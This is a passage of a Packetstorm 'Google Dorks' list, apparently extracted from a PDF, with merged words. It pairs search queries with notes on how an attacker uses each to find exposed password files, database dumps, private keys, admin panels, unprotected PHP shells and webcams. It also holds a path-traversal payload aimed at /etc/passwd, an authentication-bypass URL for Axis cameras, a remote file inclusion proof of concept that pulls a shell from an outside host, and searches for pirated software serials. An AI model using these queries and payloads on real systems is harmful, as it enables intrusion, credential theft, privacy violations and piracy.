filetype:ini ws_ftppwd filetype:ini ws_ftp pwd

The encryption method used inWS_FTP is _extremely_ weak. Thesefiles can be found with the "index of"keyword or by searching directly forthe PWD= value inside theconfiguration file.

inurl:forwardfiletype:forward -cvs

inurl:forward filetype:forward -cvs

Users on *nix boxes can forward theirmail by placing a .forward file in theirhome directory. These files revealemail addresses.

"Invision PowerBoard DatabaseError"

"Invision Power Board DatabaseError"

These are SQL error messages, rangingfrom to many connections, accessdenied to user xxx, showing full pathinfo to the php files etc.. There is anexploitable bug in version 1.1 of thissoftware and the current version is 1.3available for download on the site.

filetype:netrcpassword filetype:netrc password

The .netrc file is used for automaticlogin to servers. The passwords arestored in cleartext.

signin filetype:url signin filetype:url

Javascript for user validation is a badidea as it shows cleartext user/passcombos. There is one googledork whoforgot that.

filetype:datwand.dat filetype:dat wand.dat

The world-famous web-browser Operahas the ability to save the password foryou, and it call the system "MagicWand". When on a site, you can savethe username and password to the

Page 42: Packetstorm Google Dorks List

magic wand, then on the site again,click the magic wand icon and it willfill it out automaticly for you. What ajoy! Opera saves this file on you'rcomputer, it is located (on winXP)here: D:\Documents andSettings\Peefy\Programdata\Opera\Opera75\profile\wand.dat for me offcourse,change it so its suitable for you..But, ifyou don't have a descrambler orwhatever, the passwords arentcleartext, but you have to put the wandfile in the location specified above,then open opera, click tools, WandPasswords, then see the URL's saved,then go to theese URL's and click thewand button.

"Index Of/network" "lastmodified"

"Index Of /network" "last modified"

Many of these directories containinformation about the network, thoughan attacker would need a considerableamount of patience to find it.

inurl:/eprise/ inurl:/eprise/

silkRoad Eprise is a dynamic contentmanagement product that simplifies theflow of content to a corporate website.The software requires NT 4, Windows2000 or Solaris and is used by high-profile corporations. If an attacker cutsthe url after the eprise/ directory, he ispresented with the admin logon screen.

intitle:"albumpermissions""Users who canmodify photos""EVERYBODY"

intitle:"album permissions" "Userswho can modify photos""EVERYBODY"

Gallery (http://gallery.menalto.com) issoftware that allows users to createwebalbums and upload pictures to it. Insome installations Gallery lets youaccess the Admin permission pagealbum_permissions.php withoutauthentication. Even if not "everybody"has modify rights, an attacker can do asearch for "users who can see thealbum" to retrieve valid usernames forthe gallery.

filetype:cfg mrtg"target[*]" -sample-cvs -example

filetype:cfg mrtg "target[*]" -sample -cvs -example

Mrtg.cfg is the configuration file forpolling SNMP enabled devices. Thecommunity string (often 'public') isfound in the line starting withtarget:#Target[test]:

Page 43: Packetstorm Google Dorks List

1.3.6.1.4.1.2021.10.1.5.1&1.3.6.1.4.1.2021.10.1.5.2:public@localhostRemember not all targets are SNMP devices.Users can monitor CPU info forexample.

filetype:ldb admin filetype:ldb admin

According to filext.com, the ldb file is"A lock file is used to keep muti-userdatabases from being changed in thesame place by two people at the sametime resulting in data corruption."These Access lock files contain theusername of the last user and theyALWAYS have the same filename andlocation as the database. Attackers cansubstitute mdb for ldb and dowload thedatabase file.

inurl:search/admin.php inurl:search/admin.php

phpMySearch is a personal searchengine that one can use to provide asearch feature for one's own Web site.With this search an attacker can findadmin logon screens. This softwaredoes not seem to be very popular yet,but would allow attackers to accessindexed information about the host ifcompromised.

filetype:r2w r2w filetype:r2w r2w

WRQ Reflection gives you a standarddesktop that includes web- andWindows-based terminal emulationand X Windows products. Terminalemulation settings are saved to aconfiguration file, depending on theversion called r1w, r2w, or r4w. If anattacker loads these files he can accessthe main login screen on mainframesystems for example.

filetype:phpinurl:vAuthenticate

filetype:php inurl:vAuthenticate

vAuthenticate is a multi-platformcompatible PHP and MySQL scriptwhich allows creation of new useraccounts new user groups,activate/inactivate groups or individualaccounts, set user level, etc. There aretwo admin users by default with aneasy to guess password. The backupadmin user can *not* be deleted. Thereis also a test account with the same

Page 44: Packetstorm Google Dorks List

password that can not be deleted.Anattacker can find the default passwordsby downloading the software andbrowsing the .sql files. Defaultpasswords are seldom changed if theuser is not *forced* to change themfirst before using the sofware. Thissoftware doesn't enforce such a rule.

intitle:"ZyXELPrestige Router""Enter password"

intitle:"ZyXEL Prestige Router""Enter password"

This is the main authentication screenfor the ZyXEL Prestige Router.

"Welcome to thePrestige Web-BasedConfigurator"

"Welcome to the Prestige Web-Based Configurator"

This is the configuration screen for aPrestige router. This page indicates thatthe router has not yet been setup andany web user can make changes to therouter.

intitle:"ADSLConfigurationpage"

intitle:"ADSL Configuration page"

This is the status screen for the SolwiseADSL modem. Information availablefrom this page includes IP addresses,MAC addresses, subnet mask, firwareversion of the modem. Attackers canuse this information to formulate anattack.

"Version Info""Boot Version""Internet Settings"

"Version Info" "Boot Version""Internet Settings"

This is the status page for a BelkinCable/DSL gateway. Information canbe retrieved from this page includingIP addresses, WAN addresses, MACaddresses, firmware versions, serialnumbers, subnet masks, firewallsettings, encryption settings, NATsettings and SSID. Attackers can usethis information to formulate an attack.

filetype:sql+"IDENTIFIEDBY" -cvs

filetype:sql +"IDENTIFIED BY" -cvs

Database maintenance is oftenautomated by use of .sql files wich maycontain many lines of batched SQLcommands. These files are often usedto create databases and set or alterpermissions. The passwords used canbe either encrypted or evenplaintext.An attacker can use these filesto acquire database permissions thatnormally would not be given to themasses.

filetype:sql filetype:sql password Database maintenance is often

Page 45: Packetstorm Google Dorks List

password automated by use of .sql files thatcontain many lines of batched SQLcommands. These files are often usedto create databases and set or alterpermissions. The passwords used canbe either encrypted or evenplaintext.An attacker can use these filesto acquire database permissions thatnormally would not be given to themasses.

intitle:"WelcomeSite/UserAdministrator""Please select thelanguage" -demos

intitle:"Welcome Site/UserAdministrator" "Please select thelanguage" -demos

service providers worldwide useEnsim's products to automate themanagement of their hosting services.Currently it hosts more than 500,000Web sites and five millionmailboxes.Ensim's uses a control panelGUI to manage the servers. It has fourlevels of priviledges. The software runson TCP port 19638, but access isnormally limited to trusted hosts only.A local exploit was found bybadc0ded.org in virthostmail, part ofEnsim WEBppliance Pro.

filetype:pwdservice filetype:pwd service

Microsoft Frontpage extensions appearon virtually every type of scanner. Inthe late 90's people thought they wherehardcore by defacing sites withFrontpage. Today, there are stillvulnerable servers found with Google.An attacker can simply take advantagefrom administrators who 'forget' to setup the policies for Frontpageextensions. An attacker can also searchfor 'filetype:pwd users'.

"ttawlogin.cgi/?action=" "ttawlogin.cgi/?action="

Tarantella is a family of enterprise-class secure remote access softwareproducts. This Google-dork lists thelogin page for remote access to eitherthe site server or another server withinthe target company. Tarantella also hasa few security issues for a list ofpossible things that a malicous usercould try to do, have a look at -http://www.tarantella.com/security/index.html An example of a malicous user

Page 46: Packetstorm Google Dorks List

could try ishttp://www.tarantella.com/security/bulletin-03.html the exploit isn't includedin the User-Notice, but I've worked itout to be something like installdirectory/ttawebtop.cgi/?action=start&pg=../../../../../../../../../../../../../../../etc/passwd

Axis NetworkCameras inurl:indexFrame.shtml Axis

The AXIS 2400 is a Web server of itsown. This means that the server issecured like any other Internet host. Itis up to the network manager to restrictaccess to the AXIS Web Camerascamera server. AXIS Network camshave a cam control page calledindexFrame.shtml wich can easily befound by searching Google. Anattacker can look for the ADMINbutton and try the default passwordsfound in the documentation. Anattacker may also find that thedirectories are browsable. Additionalsecurity related information was foundon theInternet.Securityfocus(www.securityfocus.com):----------------------------------------------------"It has been reported thatthe Axis Video Servers do not properlyhandle input to the 'command.cgi'script. Because of this, an attacker maybe able to create arbitrary files thatwould result in a denial of service, orpotentially command execution." CoreSecurity Technologies Advisory(http://www.coresecurity.com):---------------------------------------------------"Wehave discovered the following securityvulnerability: by accessinghttp://camera-ip//admin/admin.shtml(notice the double slash) theauthentication for "admin" is bypassedand an attacker gains direct access tothe configuration.

POWERED BYHIT JAMMER

POWERED BY HIT JAMMER1.0!

Hit Jammer is a Unix compatible scriptthat allows you to manage the content

Page 47: Packetstorm Google Dorks List

1.0! and traffic exchange and make webchanges, all without needing HTML. Itis typicaly used by the undergroundsites on the Net who "pay for surfingads" and advertise spam services orsoftware.An attacker can find thesesites by searching for the typical"powered by hit jammer !" frase on thebottom of the main page. Then if hechanges the URL towww.target.com/admin/admin.php heis taken to the admin panel. HitJammer administrators are warned toprotect this page with the .htaccesslogon procedure, but many fail to dojust that. In such cases, customerinformation like email addresses andpasswords are in clear view of theattacker. Since human beings often useone simple password for many thingsthis is a very dangerous practice.

94FBR "ADOBEPHOTOSHOP" 94FBR "ADOBE PHOTOSHOP"

94FBR is part of many serials. Anmalicious user would only have tochange the programm name (photoshopin this example) in this search to find aperfectly valid serial.Other values tolook for are: GC6J3. GTQ62. FP876.D3DX8.

inurl:zebra.confintext:password -sample -test -tutorial -download

inurl:zebra.conf intext:password -sample -test -tutorial -download

GNU Zebra is free software thatmanages TCP/IP based routingprotocols. It supports BGP-4 protocolas well as RIPv1, RIPv2 andOSPFv2.The zebra.conf uses the sameformat as the cisco config files. Thereis an enable password (plain text orencrypted) and ipv6 tunnel definitions,hostnames, ethernet interface names, iprouting information, etc.

inurl:ospfd.confintext:password -sample -test -tutorial -download

inurl:ospfd.conf intext:password -sample -test -tutorial -download

GNU Zebra is free software thatmanages TCP/IP based routingprotocols. It supports BGP-4 protocolas well as RIPv1, RIPv2 andOSPFv2.The ospfd.conf uses the sameformat as the cisco config files. Thereis an enable password (plain text or

Page 48: Packetstorm Google Dorks List

encrypted) and ipv6 tunnel definitions,hostnames, ethernet interface names, iprouting information, etc.

intitle:"Index of /"modified php.exe intitle:"Index of /" modified php.exe

PHP installed as a cgi-bin on aWindows Apache server will allow anattacker to view arbitrary files on thehard disk, for example by requesting"/php/php.exe?c:\boot.ini."

inurl:ccbillfiletype:log inurl:ccbill filetype:log

CCBill.com sells E-tickets to onlineentertainment and subscription-basedwebsites. CCBill.com gives consumersaccess to the hottest entertainment siteson the World Wide Web. The word"hot" in this context seems apropriatewhen considering the type of sites thatuse e-tickets :)CCBill log files containusernames and password information,but are protected with DES encryption.An attacker can crack these using theinformation provided on this site:http://www.jaddo.net/forums/index.php?&act=ST&f=19&t=4242.

filetype:mdbinurl:users.mdb filetype:mdb inurl:users.mdb

Everyone has this problem, we need toremember many passwords to accessthe resources we use. Some believe it isa good solution to use MicrosoftAccess as a password database..Anattacker can find and download thosemdb files easily with Google. Thissearch tries to find such "user"databases. Some are passwordprotected, many are not. Weee!

intitle:"Error usingHypernews""Server Software"

intitle:"Error using Hypernews""Server Software"

HyperNews is a cross between theWWW and Usenet News. Readers canbrowse through the messages writtenby other people and reply to thosemessages. This search reveals theserver software, server os, serveraccount user:group (unix), and theserver administrator email address.Many of these messages also include atraceback of the files and linenumbersand a listing of the cgi ENV variables.An attacker can use this information toprepare an attack either on the platform

Page 49: Packetstorm Google Dorks List

or the script files.

filetype:cfg ksintext:rootpw -sample -test -howto

filetype:cfg ks intext:rootpw -sample -test -howto

Anaconda is a linux configuration toollike yast on suse linux. The rootpassword is often encrypted - like md5or read from the shadow. Sometimes anattacker can also get a cleartextpassword.There are more ks configsthen you might expect and with a bit ofsearching through the result list anattacker can find the root password andown that system.

filetype:phpinurl:"viewfile" -"index.php" -"idfil

filetype:php inurl:"viewfile" -"index.php" -"idfil

Programmers do strange thingssometimes and forget about security.This search is the perfect example.These php scripts are written forviewing files in the web directory (e.g.ww.XXX.com/viewfile.php?my_howto.txt --> will show you themy_howto.txt).An attacker can checkfor buggy php scripts wich allow youto view any file on the system (withwebservers permissions). Try the good,old directory traversal trick: "../../../".You have to know the filename andlocation, but that's not a big problem(/etc/passwd anyone ?).

allinurl:".nsconfig"-sample -howto -tutorial

allinurl:".nsconfig" -sample -howto-tutorial

Access to a Web server's content, CGIscripts, and configuration files iscontrolled by entries in an access file.On Apache and NCSA Web servers thefile is .htaccess, on Netscape servers itis .nsconfig.These files associate users,groups, and IP addresses with variouslevels of permissions: GET (read),POST (execute), PUT (write), andDELETE. For example, a FrontPageauthor would have permission to useHTTP POST commands (to save newcontent), and a user with browsepermissions would be permitted to useHTTP GET commands (to readcontent).

Outlook WebAccess (a betterway)

inurl:"exchange/logon.asp" ORintitle:"Microsoft Outlook WebAccess - Logon"

According to Microsoft "Microsoft (R)Outlook (TM) Web Access is aMicrosoft Exchange Active Server

Page 50: Packetstorm Google Dorks List

Application that gives you privateaccess to your Microsoft Outlook orMicrosoft Exchange personal e-mailaccount so that you can view yourInbox from any Web Browser. It alsoallows you to view Exchange serverpublic folders and the Address Bookfrom the World Wide Web. Anyonecan post messages anonymously topublic folders or search for users in theAddress Book. " Now, consider for amoment and you will understand whythis could be potentially bad.

OWA Publicfolders & Addressbook

inurl:root.asp?acs=anon

This search jumps right to the mainpage of Outlook Web Access PublicFolders and the Exchange AddressBook:.An attacker can use theaddressbook to enumerate usernamesanonymously without having to logon.These usernames can then be used toguess the mailbox passwords. Anattacker can also browse the publicfolders to gather extra informationabout the organisation.

Looking Glass "Looking Glass" (inurl:"lg/" |inurl:lookingglass)

A Looking Glass is a CGI script forviewing results of simple queriesexecuted on remote routers. There aremany Looking Glass sites all over theworld. Some are password protected,many are not.An attacker use this togather information about the network.

CGI:IRC Login filetype:cgi inurl:"irc.cgi" |intitle:"CGI:IRC Login"

CGIIRC is a web-based IRC client.Using a non-transparent proxy anattacker could communicateanonymously by sending directmessages to a contact. Most servers arerestricted to one irc server and one ormore default channels and will not letallow access to anything else.

filetype:ctt cttmessenger filetype:ctt ctt messenger

MSN Messenger uses the file extension*.ctt when you export the contact list.An attacker could use this for socialenginering tricks.

intitle:"Error intitle:"Error Occurred While Cold fusion error messages logging the

Page 51: Packetstorm Google Dorks List

Occurred WhileProcessingRequest"+WHERE(SELECT|INSERT) filetype:cfm

Processing Request" SQL SELECT or INSERT statementsand the location of the .cfm file on thewebserver.An attacker could use thisinformation to quickly find SQLinjection points.

ht://Dig htsearcherror intitle:"htsearch error" ht://Dig error

The ht://Dig system is a completeworld wide web indexing andsearching system for a domain orintranet. A list of publically availablesites that use ht://Dig is available athttp://www.htdig.org/uses.htmlht://Dig3.1.1 - 3.2 has a directory traversal andfile view vulnerability as described athttp://www.securityfocus.com/bid/1026. Attackers can read arbitrary files onthe system. If the system is notvulnerable, attackers can still use theerror produced by this search to gatherinformation such as administrativeemail, validation of a cgi-binexecutable directory, directorystructure, location of a search databasefile and possible naming conventions.

VP-ASP ShoppingCart XSS

filetype:aspinurl:"shopdisplayproducts.asp"

VP-ASP (Virtual Programming - ASP)has won awards both in the US andFrance. It is now in use in over 70countries. VP-ASP can be used to buildany type of Internet shop and sellanything.According tohttp://www.securityfocus.com/bid/9164/discussion/ a vulnerability has beenreported to exist in VP-ASP softwarethat may allow a remote user to launchcross-site scripting attacks. A remoteattacker may exploit this issue topotentially execute HTML or scriptcode in the security context of thevulnerable site.The vendor has releasedfixes to address this issue. It is reportedthat the fixes are applied to VP-ASP5.0 as of February 2004. An attackercould also search Google forintitle:"VP-ASP Shopping Cart *" -"5.0" to find unpatched servers.

Page 52: Packetstorm Google Dorks List

Unreal IRCd filetype:conf inurl:unrealircd.conf -cvs -gentoo

Development of UnrealIRCd began in1999. Unreal was created from theDreamforge IRCd that was formerlyused by the DALnet IRC Network andis designed to be an advanced IRCd.Unreal can run on several operatingsystems. Unreal works on most *nixOSes including Linux, BSD, MacOSX, Solaris, and HP-UX. Unreal alsoworks on Windows (95/98/MENT4/2K/XP/2003).This search findsconfiguration files to Unreal IRCd. Anattacker can use these to possiblydetermine the oper passwd. Be warnedthat there are samples in the results.

OWA PublicFolders (directview)

inurl:/public/?Cmd=contents

This search looks for Outlook WebAccess Public Folders directly. Theselinks open public folders orappointments. Of course there are moreways to find OWA, but the results fromthis search are different, it just dependswhich link Google has crawled.Anattacker can often read all the messagesanonymously or even post messages tothe folders. In other cases a login willbe required. This is a leak ofconfidential company information andmay give hints for social engineringtricks.

VP-ASP ShopAdministratorsonly

inurl:"shopadmin.asp" "ShopAdministrators only"

VP-ASP (Virtual Programming - ASP)has won awards both in the US andFrance. It is now in use in over 70countries. VP-ASP can be used to buildany type of Internet shop and sellanything.It has been reported that theShopping Cart Administration script isvulnerable to XSS and SQJ injection,resulting in exposure of confidentialcustomer information like credit carddetails. More information on this attackis available athttp://securitytracker.com/alerts/2002/May/1004384.html

Microsoft MoneyData Files filetype:mny mny Microsoft Money 2004 provides a way

to organize and manage your personal

Page 53: Packetstorm Google Dorks List

finances(http://www.microsoft.com/money/).The default file extension for the'Money Data Files' is *.mny.A free trialversion can be downloaded from MS. Itis reported that the password protection(linked to passport in the new versions)for these data files can be cracked witha program called "Passware".

Environment vars HTTP_USER_AGENT=Googlebot

This is a generic way of grabbing thoseCGI-spewed environmental var lists.To narrow to things down, an attackercould use any of the following:SERVER_SIGNATURE,SERVER_SOFTWARE,TNS_ADMIN, DOCUMENT_ROOT,etc.

MySQL tabledatadumps

"# Dumping data for table(username|user|users|password)"

sQL database dumps. LOTS of data inthese. So much data, infact, I'm pressedto think of what else an ev1l hax0rwould like to know about a targetdatabase.. What's that? Usernames andpasswords you say? Patience,grasshopper..... Note: this is a cleanupversion of an older googledork entry.

Welcome to ntop! intitle:"Welcome to ntop!"

Ntop shows the current network usage.It displays a list of hosts that arecurrently using the network and reportsinformation concerning the IP (InternetProtocol) traffic generated by eachhost. An attacker may use this to gatherinformation about hosts and servicesbehind the firewall.

vBulletin version3.0.1newreply.php XSS

"Powered by: vBulletin * 3.0.1"inurl:newreply.php

vBulletin is a customizable forumspackage for web sites. It has beenwritten in PHP and is complimentedwith MySQL. While a user ispreviewing the post, both newreply.phpand newthread.php correctly sanitizethe input in 'Preview', but not Edit-panel. Malicious code can be injectedby an attacker through this flaw. Moreinformation athttp://www.securityfocus.com/bid/10612/.

Page 54: Packetstorm Google Dorks List

psyBNC configfiles

filetype:conf inurl:psybnc.conf"USER.PASS="

psyBNC is an IRC-Bouncer with manyfeatures. It compiles on Linux,FreeBSD, SunOs and Solaris. Theconfiguration file for psyBNC is calledpsybnc.conf (duh).An attacker can usethe password, host and portinformationin this file to bounce his IRCconnection through these bouncers,providing some privacy or just to showoff some fancy irc hostname that areusually linked to those IP addresses.

intitle:"View andConfigurePhaserLink"

intitle:"View and ConfigurePhaserLink"

These printer's configuration is wideopen. Attackers can change just aboutany value through this control panel.Take it from FX, printers can bedangerous too! Besides, a POP3 server,username and password can be enteredinto these things! =)

intext:"Warning:Failed opening""on line""include_path"

intext:"Warning: Failed opening""on line" "include_path"

These error messages revealinformation about the application thatcreated them as well as revealing pathnames, php file names, line numbersand include paths.

filetype:phpinurl:"webeditor.php"

filetype:php inurl:"webeditor.php" This is a standard login portal for thewebadmin program.

PanasonicNetwork Cameras inurl:"ViewerFrame?Mode="

Panasonic Network Cameras can beviewed and controlled from a standardweb browser. These cameras can beplaced anywhere to keep an eye onthings, with no PC required on thelocation. Check for more information:http://www.panasonic.com/netcam/There is a htaccess protected admin page at"http://[target-ip]/config.html" on thetarget device. Admin logins have nodefaults, but created during setup.

sony SNC-RZ30Network Cameras sNC-RZ30 HOME

sony NC RZ30 camera's require a javacapable browser. The admin panel isfound athttp://[sitename]/home/l4/admin.html.

sony SNC-RZ20network cameras intitle:snc-z20 inurl:home/

sony NC RZ20 cameras, only oneresult for this cam at the moment, anice street view from a skyscraper.

Page 55: Packetstorm Google Dorks List

Mobotix netcams(intext:"MOBOTIX M1" |intext:"MOBOTIX M10")intext:"Open Menu" Shift-Reload

Mobotix netcams use the thttpd-2.x.server(http://www.acme.com/software/thttpd/). The latest version today is 2.25b, butmost cams run older versions. Theyproduce a rather nice imagequality.Moderator note: this search wasfound by L0om and cleaned up byWolveso.

Panasonic WJ-NT104 netcams intitle:"WJ-NT104 Main Page"

The Panasonic WJ-NT104 allows easymonitoring with a conventionalbrowser. More vendor information isavailable athxxp://www.panasonic.ca/English/Broadcast/security/transmission/wjnt104.asp

exported emailaddresses e-mail address filetype:csv csv

Loads of user information includingemail addresses exported in commaseparated file format (.cvs). Thisinformation may not lead directly to anattack, but most certainly counts as aserious privacy violation.

phpWebMail filetype:php login(intitle:phpWebMail|WebMail)

PhpWebMail is a php webmail systemthat supports imap or pop3. It has beenreported that PHPwebmail 2.3 isvulnerable. The vulnerability allowsphpwebmail users to gain access toarbitrary file system by changing theparameters in the URL used forsending mail (send_mail.php). Moreinfo athttp://eagle.kecapi.com/sec/fd/phpwebmail.html.

Invision PowerBoard SSI.PHPSQL Injection

"Powered by Invision PowerBoard(U) v1.3 Final"

Invision Power Board is reported proneto an SQL injection vulnerability in itsssi.php script. Due to improper filteringof user supplied data, ssi.php isexploitable by attackers to pass SQLstatements to the underlying database.The impact of this vulnerabilitydepends on the underlying database. Itmay be possible to corrupt/readsensitive data, executecommands/procedures on the databaseserver or possibly exploit

Page 56: Packetstorm Google Dorks List

vulnerabilities in the database itselfthrough this condition. Version 1.3.1Final of Invision Power Board isreported vulnerable. Other versionsmay also be affected as well.More info:http://www.securityfocus.com/bid/10511/info/

Analysis Consolefor IncidentDatabases

ACID "by Roman Danyliw"filetype:php

ACID stands for for "Analysis Consolefor Incident Databases". It is a phpfrontend for the snort intrusiondetection system database.These pagescan be used by attackers to viewnetwork attacks that have occurredagainst the target. Using thisinformation, an attacker can craft anattack and glean network informationincluding vulnerabilities, open ports, ipaddresses, network layout, existance offirewall and IDS systems, and more.

Index ofphpMyAdmin

intitle:"index of /phpmyadmin"modified

phpMyAdmin is a tool written in PHPintended to handle the administrationof MySQL over the Web. Currently itcan create and drop databases,create/drop/alter tables, delete/edit/addfields, execute any SQL statement,manage keys on fields(http://sourceforge.net/projects/phpmyadmin/).An attacker can use this searchto find phpMyAdmin enabled MySQLservers by using the "index of /"method. Consider this an alternativeway an attacker could find thembesides the older Googledorks forphpMyAdmin.

Comersus.mdbdatabase inurl:"/database/comersus.mdb"

Comersus is an e-commerce systemand has been installed all over theworld in more than 20000 sites. UsingComersus does not require that youknow any programming language.BackOffice+ allows you to definevirtually all properties of your on-linestore through an intuitive, point-&-click interface.This search goes directlyfor one of the MS Access files used bythe shopping cart. Searching Google

Page 57: Packetstorm Google Dorks List

and the well know security sites forComersus reveals more securityproblems.

Public PHPFileManagers

"Powered by PHPFM" filetype:php-username

PHPFM is an open source file managerwritten in PHP. It is easy to set up for abeginner, but still easy to customize forthe more experienced user. The built-inlogin system makes sure that onlypeople with the right username andpassword gains access to PHPFM,however, you can also choose todisable the login system and usePHPFM for public access. It cancurrently: create, rename and deletefolders; create, upload, rename,download and delete files; edit textfiles; view image files; sort files byname, size, permissions and lastmodification date both ascending anddescending; communicate in morelanguages. This search finds those"public" versions of PHPFM. Anattacker can use them to manage hisown files (phpshell anyone ?).PS:thanks to j0hnny for the public accessangle :)

private key files(.key)

BEGIN(CERTIFICATE|DSA|RSA)filetype:key

This search will find private key files...Private key files are supposed to be,well... private.

inurl:explorer.cfminurl:(dirpath|This_Directory)

inurl:explorer.cfminurl:(dirpath|This_Directory) Filemanager without authentication.

private key files(.csr)

BEGIN(CERTIFICATE|DSA|RSA)filetype:csr

This search will find private key files...Private key files are supposed to be,well... private.

PHP Shell(unprotected)

intitle:"PHP Shell *" "Enablestderr" filetype:php

PHP Shell is a shell wrapped in a PHPscript. It's a tool you can use to executearbiritary shell-commands or browsethe filesystem on your remote Webserver. This replaces, to a degree, anormal telnet-connection. You can useit for administration and maintenanceof your Web site using commands likeps, free, du, df, and more.If these shells

Page 58: Packetstorm Google Dorks List

aren't protected by some form ofauthentication, an attacker will basicly*own* the server. This search findssuch unprotected phpshells by lookingfor the keyword "enable stderr".

NickServregistrationpasswords

"Your password is * Remember thisfor later use"

NickServ allows you to "register" anickname (on some IRC networks) andprevent others from using it. Somechannels also require you to use aregistered nickname to join.This searchcontains the the nickserv responsemessage to a nick registration. Lots ofexample sites, but some that aren't...you can see which ones are fake or notin the search (some are like,your_password, while other are morerealistic ones).

Red Hat UnixAdministration intitle:"Page rev */*/*" inurl:"admin

Red Hat UNIX Administration Pages.This search detects the fixed title forthe admin pages on certain Red Hatservers. A login is required to accessthem, but an attacker could use thissearch to determine the operatingsystem used by the server.

inurl:ssl.conffiletype:conf inurl:ssl.conf filetype:conf

The information contained in thesefiles depends on the actual file itself.SSL.conf files contain port numbers,ssl data, full path names, logginginformation, location of authenticationfiles, and more. Other conf files basedon this name may contain similarinformation. Attackers can use thisinformation against a target in variousways.

PHP applicationwarnings failing"include_path"

PHP application warnings failing"include_path"

These error messages revealinformation about the application thatcreated them as well as revealing pathnames, php file names, line numbersand include paths.PS: thanks to fr0zenfor correcting the google link for thisdork (murfie, 24 jan 2006).

"Internal ServerError" "server at" "Internal Server Error" "server at"

We have a similar search already, but itrelies on "500 Internal Server" whichdoesn't appear on all errors like this

Page 59: Packetstorm Google Dorks List

one. It reveals the serveradministrator's email address, as wellas a nice server banner for Apacheservers. As a bonus, the webmastermay have posted this error on a forumwhich may reveal (parts of) the sourcecode.

inurl:lilo.conffiletype:confpassword -tatercounter2000 -bootpwd -man

inurl:lilo.conf filetype:confpassword -tatercounter2000 -bootpwd -man

LILO is a general purpose bootmanager that can be used to bootmultiple operating systems, includingLinux. The normal configuration file islocated in /etc/lilo.conf. Each bootableimage can be protected by a passwordif needed. Please note that all searchesfor configuration files will contain atleast some false positives.

filetype:phpinurl:"logging.php" "Discuz" error

filetype:php inurl:"logging.php""Discuz" error

Discuz! Board error messages relatedto MySQL. The error message may beempty or contain path information orthe offending SQL statement. Alldiscuz! board errors seem to be loggedby this php file.An attacker can use thisto reveal parts of the database andpossibly launch a SQL attack (byfiltering this search including SELECTor INSERT statements).

intitle:"MicrosoftSite ServerAnalysis"

intitle:"Microsoft Site ServerAnalysis"

Microsoft discontinued Site Server andSite Server Commerce Edition on June1, 2001 with the increasing adoption ofits successor, Microsoft CommerceServer 2000 Server and MicrosoftCommerce Server 2002. There are stillsome installations online however. Anattacker may use these reports to gatherinformation about the directorystructure and possibly identify scriptfiles.

intitle:"Index of"passwordsmodified

intitle:"Index of" passwordsmodified

These directories are named"password." I wonder what you mightfind in here. Warning: sometimes p0rnsites make directories on servers withdirectories named "password" andsingle html files inside named thingsliks "horny.htm" or "brittany.htm."These are to boost their search results.

Page 60: Packetstorm Google Dorks List

Don't click them (unless you want to beburied in an avalanche ofp0rn...Moderator note: This is acleanup of a previous googledork,improving the results by using "intitle"and an extra keyword from the indexpage (in this case modified).

index.of.password index.of.password

These directories are named"password." I wonder what you mightfind in here. Warning: sometimes p0rnsites make directories on servers withdirectories named "password" andsingle html files inside named thingsliks "horny.htm" or "brittany.htm."These are to boost their search results.Don't click them (unless you want to beburied in an avalanche ofp0rn...Moderator note: This googledorkhas expired ! Seealso:http://johnny.ihackstuff.com/index.php?module=ProdReviews&func=showcontent&id=380

"powered bywebcamXP""Pro|Broadcast"

"powered by webcamXP""Pro|Broadcast"

webcamXPPRO:http://www.webcamxp.com/productsadv.htmlThis is the most advancedversion of the software. It has all thefeatures of the other versions(including advanced usersmanagement, motion detector, andalerts manager) plus remoteadministration and external servernotification when going offline/online.

"powered bysphider" -exploit -ihackstuff -www.cs.ioc.ee

"powered by sphider" -exploit -ihackstuff -www.cs.ioc.ee

dork: "powered by sphider" avulnerable search engine scriptarbitrary remote inclusion, poc:http://[target]/[path]/admin/configset.php?cmd=ls%20-la&settings_dir=http://somehost.comwhere on somehost.com you have ashellcode in /conf.php/index.htmlreferences:http://retrogod.altervista.org/sphider_13_xpl_pl.htmlhttp://secunia.com/advisories/19642/

"by ReimarHoven. All Rights

"by Reimar Hoven. All RightsReserved. Disclaimer" |

dork: "by Reimar Hoven. All RightsReserved. Disclaimer" |

Page 61: Packetstorm Google Dorks List

Reserved.Disclaimer" |inurl:"log/logdb.dta"

inurl:"log/logdb.dta" inurl:"log/logdb.dta" this is for PHPWeb Statistik script, you can go to:http://[target]/[path_to]/log/logdb.dta tosee clear text logs

"ORA-12541:TNS:no listener"intitle:"erroroccurred"

"ORA-12541: TNS:no listener"intitle:"error occurred"

In many cases, these pages display nicebits of SQL code which can be used byan attacker to mount attacks against theSQL database itself. Other pieces ofinformation revealed include pathnames, file names, and data sources.

"sets mode: +p" "sets mode: +p" This search reveals private channels onIRC as revealed by IRC chat logs.

"sets mode: +k" "sets mode: +k"This search reveals channel keys(passwords) on IRC as revealed fromIRC chat logs.

"sets mode: +s" "sets mode: +s" This search reveals secret channels onIRC as revealed by IRC chat logs.

intitle:"BorderManager Informationalert"

intitle:"BorderManager Informationalert"

This is an Informational messageproduced by the NovellBorderManager firewall/proxy server.Attackers can located perimeterdefence systems with this query.

"AnWeb/1.42h"intitle:index.of "AnWeb/1.42h" intitle:index.of

The version of a particular web servercan be detected with a simple querylike this one. Although the same thingcan be accomplished by browsing theweb site, this method offers anotherlayer of anonymity. Armed with thisinformation an attacker can plan anattack with more precision.

"CERN httpd 3.0B(VAX VMS)" "CERN httpd 3.0B (VAX VMS)"

The version of a particular web servercan be detected with a simple querylike this one. Although the same thingcan be accomplished by browsing theweb site, this method offers anotherlayer of anonymity. Armed with thisinformation an attacker can plan anattack with more precision.

"JRun WebServer"intitle:index.of

"JRun Web Server" intitle:index.of

The version of a particular web servercan be detected with a simple querylike this one. Although the same thingcan be accomplished by browsing theweb site, this method offers another

Page 62: Packetstorm Google Dorks List

layer of anonymity. Armed with thisinformation an attacker can plan anattack with more precision.

"MaXX/3.1"intitle:index.of "MaXX/3.1" intitle:index.of

The version of a particular web servercan be detected with a simple querylike this one. Although the same thingcan be accomplished by browsing theweb site, this method offers anotherlayer of anonymity. Armed with thisinformation an attacker can plan anattack with more precision.

"Microsoft-IIS/*server at"intitle:index.of

"Microsoft-IIS/* server at"intitle:index.of

The version of a particular web servercan be detected with a simple querylike this one. Although the same thingcan be accomplished by browsing theweb site, this method offers anotherlayer of anonymity. Armed with thisinformation an attacker can plan anattack with more precision.

"Microsoft-IIS/4.0"intitle:index.of

"Microsoft-IIS/4.0" intitle:index.of

